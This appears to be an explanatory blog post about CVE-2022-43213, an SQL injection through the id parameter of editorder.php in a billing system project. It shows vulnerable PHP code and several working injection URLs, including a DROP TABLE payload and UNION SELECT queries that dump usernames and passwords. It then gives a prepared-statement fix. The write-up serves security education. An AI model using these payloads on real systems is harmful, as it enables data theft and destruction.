CVE-2022-43213 - SQL Injection in Billing System Project v1. (editorder.php) Explained

In the world of web security, SQL injection vulnerabilities remain one of the most common and dangerous threats. One such vulnerability, tracked as CVE-2022-43213, affects the open-source Billing System Project v1.. Discovered in late 2022, this weakness allows attackers to execute malicious SQL commands through improper handling of user input—specifically via the id parameter on the editorder.php page.

This post will break down everything you need to know about CVE-2022-43213: how it works, how it can be exploited, and how to fix it, using simple language and clear code examples.

What is CVE-2022-43213?

CVE-2022-43213 is an SQL Injection vulnerability discovered in the editorder.php file of Billing System Project version 1.. The application takes an input parameter called id from the URL and uses it in an SQL query without proper sanitization or parameterization.

What does this mean?

If an attacker is able to control the id value, they can change the SQL query to do almost anything they want—like dumping data, deleting tables, or even gaining administrator access.

Where is the Vulnerability?

Location:  
/editorder.php?id=<value>

The problem is that the code takes $_GET['id'] and puts it directly into a database query.

Here’s a simplified version of what the relevant PHP code might look like

<?php
include('db.php');
$id = $_GET['id']; // Gets the 'id' value from the URL, no validation!
$query = "SELECT * FROM orders WHERE id = $id"; // BAD! Direct use of user input
$result = mysqli_query($con, $query);
?>

In this code, the value of $id comes directly from user input with no filtering. That means an attacker can modify the query by adding SQL code into the id parameter.

Attacker visits:

http://example.com/editorder.php?id=1

Attacker tries:

http://example.com/editorder.php?id=1 OR 1=1

More dangerous payload:

http://example.com/editorder.php?id=1; DROP TABLE users;--

Extracting usernames and passwords (if such columns exist)

http://example.com/editorder.php?id=1 UNION SELECT username, password, null, null FROM users-- -

This will try to join the users table and display usernames and passwords in the results.

Example: Dumping all users

Suppose you want to reveal contents from the users table.

http://example.com/editorder.php?id=-1 UNION SELECT 1, username, password FROM users-- -

*This URL will make the script combine data from the users table with the orders table, possibly exposing sensitive information on the page.*

References

- NVD Entry for CVE-2022-43213
- Exploit-DB: 51010
- Original Vendor Source Code

1. *Always Use Prepared Statements!*

Update database queries to use parameterized queries, not direct user input.

Fixed Code Example

<?php
include('db.php');
$id = $_GET['id'];
$stmt = $con->prepare("SELECT * FROM orders WHERE id = ?");
$stmt->bind_param('i', $id); // 'i' means integer
$stmt->execute();
$result = $stmt->get_result();
?>

Ensure the id is always an integer.

$id = intval($_GET['id']);

3. Limit Database Privileges:

Ensure the web app user cannot DROP tables or access system databases.

Conclusion

CVE-2022-43213 is a serious security flaw in the Billing System Project v1.. If left unpatched, it can give attackers full control over your data. Luckily, fixing it is simple: always use prepared statements and never trust user input directly!

If you use this billing system, make sure you update your code immediately.

Want more details?  
Check out the NVD entry or exploit database for technical references and proof-of-concept exploits.

Timeline

Published on: 11/23/2022 03:15:00 UTC
Last modified on: 11/28/2022 19:44:00 UTC